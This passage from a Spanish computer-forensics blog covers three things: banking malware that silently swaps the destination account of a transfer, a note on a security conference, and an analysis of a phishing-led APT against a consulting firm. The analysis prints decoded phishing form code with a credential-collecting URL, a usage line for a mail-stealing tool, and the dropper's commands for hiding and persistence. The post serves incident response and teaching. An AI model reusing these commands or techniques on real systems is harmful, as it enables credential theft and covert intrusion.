
Vamos a ver su funcionamiento una vez ejecutado el 'fraudeware' desde el punto de vista de aplicación y simulando ser la victima.

Inciamos sesión en la banca electrónica en cuestión, obteniendo la siguiente pantalla con la posición global, es decir nuestras cuentas y tarjetas de crédito.

 Posición Global

Una vez en este punto, nos proponemos realizar una transferencia a una cuenta conocida. Es decir pasamos 1.000€ de la cuenta total a la cuenta limitada.

Pantalla de transferencia

En este paso, lanzamos Tamper Data, para capturar y poder ver si se modifican los parámetros del post. Aquí se ha realizado con esta utilidad para su comprensión y entendimiento, pero la realidad es que estuvimos varios días monitorizando, procesos, comunicaciones y análizando tráfico "por un tubo".

Pantalla del Tamper Data

Una vez lanzado, Tamper Data nos muestra en el mismo momento de pulsar el botón 'confirmar' los campos que van a ser enviados y entre ellos el campo 'cuentaDestino' que contiene un número de cuenta que nada tiene que ver con el puesto en la cuenta de abono . Es decir el número de cuenta de abono '*52 07006*', es sustituido por un número de cuenta con destino en Rumanía.

En este paso y como en casi todas las bancas electrónicas se nos pide la operación de firma, es decir o bien una posición de la tarjeta de coordenadas, un token o una clave de un sólo uso que se puede enviar al móvil.

El usuario confiado y dado que ve en pantalla (que no en el post de envío) un número de cuenta corriente conocido procede a utilizarlo y pulsar la confirmación. Es aquí donde desaparecen 1.000€

Como decia anteriormente, está técnica ya no es funcional para los piratas dado que la entidad puso medidas correctoras, pero eso ya será en otro post, que hoy vengo de viaje y estoy algo cansado.

Y otra NcN que finaliza...

Hola lectores,

Este fin de semana se celebró la No cON Name (NcN), uno de los congresos más esperados (junto a la Rooted Con) en el que se congregan cientos de personas que nos dedicamos a la seguridad informática. Para mi es un evento especial dado que lo sigo desde sus comienzos y allí nos juntamos viejos/jovenes conocidos para debatir y compartir.

Mi intervención fue fugaz dado que llegue con el tiempo justo y me fui "cagando leches" dado que tenía un fuego que apagar. Espero que al año que viene me pueda quedar en todas las jornadas.

Mi conferencia trato sobre "Seguridad informática en entornos militares" un tema que me apasiona enormemente y mas enfocado a los entrenamientos CWID.

Por otro lado las conferencias debieron de ser una maravilla tal y como cuenta Lorenzo en su entrada en Security By Default y pronto (quizás la semana que viene) estén las presentaciones disponibles para todos.

Un congreso muy bien organizado y altamente recomendable para aprender y compartir.

Valga este post, para insistir que en España disponemos de muy buenos investigadores de seguridad informática y como los buenos futbolistas se están exportando fuera de nuestro país.

En cuanto a mi espero volver a vernos en el siguiente 'sarao' que no se si es el asegur@IT de Chema o el de ciber-policias o el congreso Xtreland, a buen seguro en alguno nos vemos. 

Un ataque persistente (APT)

Hola lectores,

Perdón por el retraso, es lo que hay, mucho trabajo y que no falte que estamos en crisis. :-)

Ha sido un verano movido con mis nuevas funciones y casi no he parado, motivo que hace que no pueda escribir con la misma frecuencia de antes. No obstante CONEXIONINVERSA siempre será un punto de encuentro donde exponer todo lo que aprendo, especialmente en aquellos casos divertidos y complejos y que puedan de alguna forma ayudar a todos los que os guste este maravilloso mundo del Análisis Forense Informático.

Hoy vamos a ver un ataque especifico, insidioso y pensado para hacer mucho daño.

Advance Persistent Threat

Es un concepto que muchos ya sabréis este se denomina APT que significa Advance Persistent Threat, que no es otra cosa que un nuevo vector de ataque que tiene un propósito definido y que su objetivo es abrir una brecha o fallo de seguridad sin que la empresa tenga constancia de que la tiene y de ahí robar la mayor información posible.

Es un tipo de ataque que se alarga en el tiempo y suele pasar inadvertido por usuarios y administradores de sistemas. Los atacantes suelen actuar en equipo y poseen altos conocimientos de seguridad informática. Muchos de estos ataques son financiados por gobiernos o el cibercrimen y tienen relaciones políticas, económicas o militares. Aquí interviene el dicho "la información es poder".

EL CASO

En el mes de Julio estuve colaborando con una compañía que de forma rutinaria descubrió con asombro que su empresa era objeto de un ataque APT.

Según me comentaba el cliente (una firma de alto prestigio internacional dedicada a la auditoría y consultoría) nada les hacia pensar que ellos mismos podrían ser objetivos de un ataque de esta magnitud. A día de hoy, los dirigentes de esta compañía no son capaces de cuantificar  que y cuanto ha podido ser sustraído y que problemas les puede venir en el futuro.

Nuestro caso empieza con una simple alerta de un usuario (un directivo)  que dice haber recibido un correo de un colaborador externo (de otro directivo) y en el que le solicitan que introduzca las credenciales de una cuenta de gmail (que el no dispone) para el acceso a unos documentos de Google Docs. Tras una revisión por parte de los administradores se detecta que han recibido cientos de correos dirigidos a empleados solicitando las claves de gmail de los usuarios.

Hasta aquí puede ser otro caso más de phising y los administradores podrían haber marcado el correo y 'santas pascuas', nadie se hubiera enterado, pero parece ser que muchos usuarios han introducido las claves y han abierto estos documentos, detectando más tarde como veremos que se han infectado con un curioso malware.

ANALISIS DEL ATAQUE:

Procedemos tras unos días de investigación, a revisar los correos que los usuarios han recibido.

Como decía anteriormente, las víctimas reciben un mensaje desde una dirección de email que aparentemente es de un estrecho colaborador de una de las empresas que forman este grupo empresarial y  que evidentemente mas tarde se demostró que es falsa. El contenido del correo es un formulario que 'invita' a introducir las credenciales de 'gmail' para acceder a Google Docs con un sugerente contenido de correo con ficheros adjuntos de nombres "Technical_Airport_Docs.docx" "Report_confidential_employees.xls".

El formulario HTML está codificado en Base64 y las cabeceras del correo vienen a decir lo siguiente:

........................
Received: from omh-ma01.r1000.mx.aol.com (omh-ma01.r1000.mx.aol.com [172.29.41.7])
    by mtaout-da03.r1000.mx.aol.com (MUA/Third Party Client Interface) with ESMTP id 663DEE0000F1
    for XXXXXXXX@gmail.com>; Tue,  11 Jul 2011 12:32:11 -0400 
Received: from mtaout-ma02.r1000.mx.aol.com (mtaout-ma02.r1000.mx.aol.com [172.29.41.2])
    by omh-ma01.r1000.mx.aol.com (AOL Outbound Holding Interface) with ESMTP id 5CDF8E000086
    for XXXXXXXX@gmail.com>; Tue,  11 Jul 2011 12:32:11 -0400 
Received: from web-server (unknown [122.146.219.130])
    by mtaout-ma02.r1000.mx.aol.com (MUA/Third Party Client Interface) with SMTP id 40157E000F42
    for XXXXXXXX@gmail.com>; Tue,  11 Jul 2011 12:32:11 -0400 
Date: Tue, 11 Jul 2011 12:32:11From: XXXXXXXXXXXXX
To: XXXXXXXXXX
Subject: Nueva documentación: Novedades
X-Mailer: Foxmail 6, 10, 201, 20  - Foxmail es muy utilizado en China para realizar ataques de phising
Mime-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: base64
X-AOL-SCOLL-SCORE: 1:2:254689392:93952408  
X-AOL-SCOLL-URL_COUNT: 2  
X-AOL-IP: 122.146.219.130  - Ubicado en Taipei en Taiwan
x-aol-global-disposition: G
X-AOL-SCOLL-SCORE: 1:2:278191424:93952408  
X-AOL-SCOLL-URL_COUNT: 2  
x-aol-sid: 3039ac1d33834e37e77f14f3

PGI+WW91ciBhY2NvdW50IHdpbGwgYmUgbG9ja2VkIGZvciB1bnVzdWFsIGFjY291bnQgYWN0
aXZpdHksIHdoaWNoIGluY2x1ZGVzLCBidXQgaXMgbm90IGxpbWl0ZWQgdG86PGJyPg0KPG9s
Pg0KPGxpPlJlY2VpdmluZywgZGVsZXRpbmcsIG9yIGRvd25sb2FkaW5nIGxhcmdlIGFtb3Vu
dHMgb2YgbWFpbCB2aWEgUE9QIG9yIElNQVAgaW4gYSBzaG9ydCBwZXJpb2Qgb2YgdGltZS48
L2xpPg0KPGxpPlNlbmRpbmcgYSBsYXJnZSBudW1iZXIgb2YgdW5kZWxpdmVyYWJsZSBtZXNz
YWdlcyAobWVzc2FnZXMgdGhhdCBib3VuY2UgYmFjaykuPC9saT4NCjxsaT5Vc2luZyBmaWxl
LXNoYXJpbmcgb3IgZmlsZS1zdG9yYWdlIHNvZnR3YXJlLCBicm93c2VyIGV4dGVuc2lvbnMs
IG9yIHRoaXJkIHBhcnR5IHNvZnR3YXJlIHRoYXQgYXV0b21hdGljYWxseSBsb2dzIGluIHRv
........truncado a proposito


La información nos indica:

Es decir el correo parece que tiene su origen desde Taiwan, ahora procedemos a ver el contenido del formulario 'html' previamente descodificado. Esta es la información que ofrece (en color rojo):

form name=3D"1318a6060f9f02b2_mygmail_loginform" action=3D"http://www.lsbu.ac.uk/php4-cgiwrap/hscweb/cm/login.php" method=3D"post" target=3D"_blank" ons=
ubmit=3D"alert("This form has been disabled."); return false">{di=
v name=3D"gaia_loginbox">

--------------------------------

input name=3D"AGALX" value=3D"NIE34iN5DAAYY" type=3D"hidden">=20
 input name=3D"myEmail" size=3D"18" value=3D"xxxxxxxxxxxxxxx@gmail.com" typ=
e=3D"text">{/td>

Una URL que apunta a un servidor web propiedad de London South Bank University y que nada tiene que ver con los dominios del cliente, revisando el dominio (lsbu.ac.uk), vemos que apunta a una dirección ubicada en Reino Unido. La pregunta es ¿Estará comprometido el servidor?

A continuación procedo a introducir en el formulario unas credenciales falsas de una cuenta que me he creado previamente en Gmail. También capturo el trafico para ver que información devuelve.

Si nos fijamos en la captura del tráfico, estamos mandando las claves al atacante y una vez enviadas nos dirige a una url de Google Docs. Lo curioso del tema es que es una url pública a la que se accede sin autenticación.

Como es de sospechar, hay muchas posibilidades de que nos encontremos con malware, o quizás algún 0 Day. En este punto 'clonamos' y virtualizamos  el equipo windows de la persona que dio la alerta a los administradores con objeto de simular de forma precisa el entorno.

Tras iniciar el entorno virtual y ponernos a analizar el documento procedemos como medida cautelar a descargarlo y enviarlo a Virus Total, con nulos resultados.

En apariencia no hay malware (0 de 44 motores ), pero lo mejor es ejecutarlo y para ello vamos a proveernos de nuestras mejores tools de nuestra preciada caja de herramientas y añadiré las de Sysinternals con objeto de monitorizar lo que hace en nuestro entorno Windows. Os recomiendo la lectura del blog del grande Mark Russinovich el autor de Sysinternals sobre "Analyzing a Stuxnet Infection with the Sysinternals Tools, Part 1, 2, 3"y que podéis leer desde aquí.

Me dispongo a lanzar el documento y espero unos minutos para que en el mejor de los casos si es un malware le de tiempo al equipo infectarse tranquilamente. Esto es lo que ha ocurrido de una forma resumida.

El archivo '.docx' da un clásico error de 'runtime' como el siguiente:

Tal y como lo estamos monitorizando, se ha lanzado un proceso de nombre 'file.exe' y se ha creado un fichero '.html' en la siguiente ruta:

C:\Documents and Settings\KLY\Local Settings\Temp\mhzksbnz.html






Revisando los strings del nuevo proceso apunta a que registra las pulsaciones del teclado. ¿será un keylogger?

El proceso 'file.exe' crea también un fichero 'UpdaterInfo.dat' y diversas librerías .dll y otros diversos ficheros 'html'.

En este momento hago un volcado de memoria utilizando Dumpit de la empresa MoonSols y cuyo fundador es el gran Matthieu Suiche.

DumpIt es una fusión de win32dd y win64dd en un único archivo ejecutable. Sólo un doble clic sobre el ejecutable es suficiente para generar una copia de la memoria física en el directorio actual.

Tras el análisis del fichero de memoria, utilizando las tools de Volatility procedo a extraer el proceso del fichero de memoria y enviarlo a Anubis (un analizador de binarios) confirmando que efectivamente se trata de un keylogger. (ver reporte aquí)

No obstante con objeto de comprobarlo y mirando tal y como indica el informe, efectivamente existe el fichero en la máquina clonada y el contenido de UpdaterInfo.dat contiene todo lo tecleado hasta el momento.

CONTINUAMOS...

Seguimos investigando y vemos que el proceso lanza una conexión a internet y por HTTP se conecta al siguiente dominio 'tomitomi.cn - 195.248.234.157' (registrado a nombre de Zhejiang 5 Red interior design company) y procede a la descarga de un fichero comprimido de nombre 'gamer.zip'

Este fichero se almacena en la carpeta 'temp' y contiene a su vez los siguientes ficheros:

• iam.exe 
• iam.dll 
• m.exe 
• r.exe
• y.exe
• sas.bat 

Los ficheros 'iam.exe' e 'iam.dll', son detectados por virustotal como herramientas de Hacking, el fichero 'y.exe' es detectado por 25 motores de 41 como malware y los demás archivos no son detectados por ninguno de los motores. 

IAM.EXE - IAM.DLL

Los ficheros 'iam.exe' e 'iam.dll' no son exactamente malware y pertenecen a un conjunto de herramientas de la empresa CORE SECURITY. Estos ficheros (según se indica en la web) permite cambiar en memoria las credenciales NTLM asociados con la sesión actual de Windows, es decir el nombre de usuario, dominio y hashes.

Todo apunta a que este 'raro-ware' esta pensado para robar las credenciales de los usuarios. 

M.EXE

'm.exe' es una variación de 'getmail' y sirve para recuperar mensajes de correo electrónico

He adjuntado los dos 'strings' de ambos, con objeto de ver si contiene algo interesante y vaya si lo tiene.

'm.exe' se puede utilizar para recuperar mensajes de correo electrónico de un servidor Exchange. El uso según los 'strings' es el siguiente:

Ejemplo:

%s -s:sn-server1.mailserver.com -u:exuser4 -t:2011-7-25-14 -o:c:\winnt\temp

%s -s:ExchangeServer -u:UserName -t:YYYY-MM-DD-HH -o:SavePath

Es necesario especificar el nombre de usuario, nombre del servidor, rango de fechas y la ubicación donde guardar los correos robados. Una vez lanzado al servidor Exchange los mensajes de correo electrónico se convertirá en texto y archivos adjuntos guardados en carpetas.

R.EXE

El ejecutable 'r.exe' es el archivo 'rar.exe' de Winrar, dado que no tiene huella para comprobar su integridad, procedo a descargarlo y aplicar la huella en MD5 y SHA1 coincidiendo ambas dos y dado que no me fío vuelvo a pasarlo por Virustotal y varios analizadores de binarios. También comparo los strings, aparentemente es el mismo fichero.

Y.EXE

'y.exe' añade al sistema funcionalidades de rootkit, ya que registra los procesos que se ejecutan al iniciar el sistema, crea archivos en el directorio Windows, modifica partes del registro y sustituye comandos de sistema operativo.

Entre ellos crea el fichero 'C:\WINDOWS\system32\prxy.dll' y un archivo por lotes de nombre 'sas.bat' a continuación se crea un proceso basando en 'cmd.exe' con el siguiente comando 'cmd /c rundll32 prxy.dll,RundllInstall' y con los posteriores comandos:

cmd /c attrib +h +s prxy.dll
cmd /c net start bits
cmd /c net stop bits
cmd /c rundll32 prxy.dll,RundllInstall
prxy.dll
cmd /c sas.bat
del %s
del %s /as
ping 127.0.0.1 -n 3
del sas.bat

PRXY.DLL


Creado por 'Y.EXE' parece que reemplaza el servicio legitimo BITs de windows ubicado en la siguiente rama del registro:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\Parameters

'prxy.dll' parece que permite la descarga de software sin que los antivirus o cortafuegos hagan algo al respecto, dado que al tratarse de un servicio legitimo estos permiten la entrada y salida de trafico hacia internet. (esto no lo tenemos claro todavía)

SAS.BAT

Como su nombre indica es un fichero de proceso por lotes y quizás este es el mas sorprendente de los ficheros analizados por el contenido.

Se puede apreciar que este fichero es parte de otro y que su objetivo es capturar hashes y contraseñas. Una vez las obtiene (al igual que los correos en formato texto) se propone a empaquetarlas en un archivo que no ofrezca sospechas como ~WRD0100.tmp. He de decir que no se han encontrado los ejecutables 'PWDumpx.exe'.

Si descomprimimos el archivo ~WRD0100.tmp nos encontramos con lo siguiente:

Un montón de correos electrónicos, presumiblemente lanzados por el ejecutable 'm.exe'

CONSIDERACIONES

Aunque no hemos realizado ingeniería inversa de la mayoría de los ejecutables (estamos todavía en ello) podemos determinar que disponemos de un montón de evidencias de que la empresa ha sido víctima presumiblemente de un ataque auto-dirigido.

¿QUE HA OCURRIDO?

Bueno aunque con este desglose todavía es pronto para dar unas conclusiones exactas de lo ocurrido, me atrevo a decir lo siguiente:

Los hackers, han lanzado un ataque auto-dirigido con objeto de comprometer las cuentas de Gmail y apoderarse de datos privados de los empleados de está empresa, (no me atrevo a decir con que objeto). Aprovechando el ataque han instalado (utilizando ingeniería social) desde un keylogger hasta un kit de herramientas para la elevación de permisos, obtención de documentos y correos electrónicos.

Por lo que parece no se sabe muy bien si esto ha llegado a funcionar, dado que parece que faltan ejecutables y todo apunta a que no estaba muy bien construido el malware, pero solo es una opinión y todavía faltan cosas por contrastar.

¿CONCLUSIONES?

En este punto surgen muchas dudas, por ejemplo ¿Como se envían los datos robados y a quien?. ¿porque quieren las cuentas de gmail de estos usuarios?, ¿Quien tiene este especial interés?, ¿Es alguien de dentro o de fuera?, ¿Desde cuanto tiempo llevan actuando?.

Stutnex dio la bandera de salida, fue famoso internacionalmente por su complejidad e innovación, pero la cuestión es ¿cuantos de estos ataques en menor medida pasan en las empresas?, un pendrive en la puerta de un bar donde vas a tomar café, ¿no lo 'enchufarías' para ver lo que hay?. ¿Miramos lo suficiente nuestros log's de sistemas y aplicaciones?, quizás llegado a este punto donde la tecnología es parte fundamental de nuestra vida, deberíamos de prestar especial atención a esas pequeñas cosas como un escaneo de red, tráfico que no solemos tener o una regla modificada.

Deberemos de pensar en cosas como SIEM y disponer de inteligencia en nuestros sistemas de información que informen ante una anomalía.

Todavía son muchas preguntas sin respuesta y en este instante mientras lees el post, en esta empresa (que sufre en silencio las hemorroides) siguen limpiando, revisando log's y actualizando políticas de contraseñas. También estamos haciendo el análisis forense y quedan muchas cosas por mirar.

Una cosa más y por último, a día de hoy, algo o alguien todavía entra en mi cuenta ficticia de Gmail.